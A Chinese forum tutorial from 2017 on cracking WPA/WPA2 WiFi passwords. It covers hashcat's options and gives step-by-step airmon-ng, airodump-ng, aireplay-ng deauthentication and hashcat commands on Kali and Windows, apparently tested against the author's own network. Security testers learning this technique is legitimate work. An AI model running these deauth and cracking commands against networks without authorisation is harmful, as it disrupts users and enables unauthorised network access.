本帖最后由 betula 于 2017-4-13 11:31 编辑
这几天有读者来问hashcat的问题,今天发出来给大家。
我们论坛之前也有一篇关于hashcat的文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=3893
我就在此写个新版的使用方法吧,技术含量不高,老鸟飞过。
Hashcat是什么呢?Hashcat是当前最强大的开源密码恢复工具,你可以访问Hashcat网站来了解这款工具的详细情况。本质上,Hashcat 是一款高级密码恢复工具,可以利用CPU或GPU资源来攻击160多种哈希类型的密码。
下载地址推荐去官方下载最新版本:https://hashcat.net/hashcat/
0X01 hashcat工具介绍
1.解释下参数:
hashcat –help #查看帮助文档General:
-m (–hash-type=NUM) #hash种类,下面有列表,后面跟对应数字
-D –opencl-device-types | Str| OpenCL device-types to use, separate with comma #选择用CPU还是GPU来破解
-a (–attack-mode=NUM) #破解模式,下面也有列表
attack-mode:
- 0 = Straight (字典破解)
- 1 = Combination (组合破解)
- 2 = Toggle-Case
- 3 = Brute-force (掩码暴力破解)
- 4 = Permutation (组合破解)
- 5 = Table-Lookup
具体方法还是用–help看下,这里就不一一介绍了。
0X02 在Kali下使用hashcat破解wifi密码
1.首先开启网卡的监听模式
[AppleScript] 纯文本查看 复制代码 airmon-ng start 网卡接口
2.扫描附近无线情况
[AppleScript] 纯文本查看 复制代码 airodump-ng wlan0mon
我们要测试的wifi名称是YJS,我用我的手机连上去,有设备就好抓握手包了。我们想办法让我的手机掉线,然后再重新连接时抓取握手包,跑包就可以了。
3.抓取握手包
[AppleScript] 纯文本查看 复制代码 airodump-ng --bssid EC:26:CA:33:E1:B6 -c 6 -w testap wlan0mon
参数说明: –bssid 目标AP MAC
-c 目标AP所在信道
-w 握手包保存的文件名
4.使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包
[AppleScript] 纯文本查看 复制代码 aireplay-ng -0 0 -a EC:26:CA:33:E1:B6 -c C0:EE:FB:E9:9D:7C wlan0mon
参数解释: -0 Deautenticate攻击模式 0代表无限次(是数字)
-a 目标ap的mac
-c 客户端网卡mac
发起攻击后我们可以看到客户端的帧(Frames)迅速增加
得到的握手包:
5.用aircrack-ng把cap转换成hccap
[AppleScript] 纯文本查看 复制代码 aircrack-ng <out.cap> -J <out.hccap>
这个就不用细说了吧,第一个是cap第二个是转换后得到的hccap文件。
6. 用hashcat破解WPA/PSK密码
[AppleScript] 纯文本查看 复制代码 hashcat -m 2500 testap.hccap pass.txt
使用hashcat命令,第一个参数: -m 2500为破解的模式为WPA/PSK方式 ,第二个参数: hccap格式的文件是刚刚转化好的文件, 第三个参数:pass.txt为字典文件 :
破解的结果:
0X03 在Windows下使用hashcat破解wifi密码
抓包过程就演示了,直接拿抓包的包来测试了。
转换有两种方法:
1.官网转换地址:https://hashcat.net/cap2hccapx/
2.用官方给的转换工具:hashcat-utils
3.还有一个Cap-Converter
这个在新版里面就不推荐用了,因为新版的是HCCAPX 文件。
github:https://github.com/wpatoolkit/Cap-Converter

一、开始用hashcat-utils转换cap包
github:https://github.com/hashcat/hashcat-utils
我现在用的是1.7的版本
使用方法:
cap2hccapx input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
[AppleScript] 纯文本查看 复制代码 cap2hccapx.exe testap-01.cap test.hccapx
执行后会在目录下生成test.hccapx。
二、开始用hashcat来破解
下载地址:https://github.com/hashcat/hashcat
执行:[AppleScript] 纯文本查看 复制代码 hashcat64.exe -m 2500 -D 1 1.hccapx pass.txt
一些参数上面已经说明了,-D是意思就是选择用CPU还是GPU来破解,因为我电脑显卡有问题就用CPU来破解了。
如果没有显示出结果可以通过家–show来显示:
相关内容可以浏览一下文章:
https://hashcat.net/wiki/ hashcat的wiki
https://hashcat.net/forum/ hashcat 的论坛(我有很多不懂的就是在上面找答案的)
https://zhuanlan.zhihu.com/p/21596402 sn0w写的一篇关于wifi破解的文章
http://getpass.cn/?p=199
|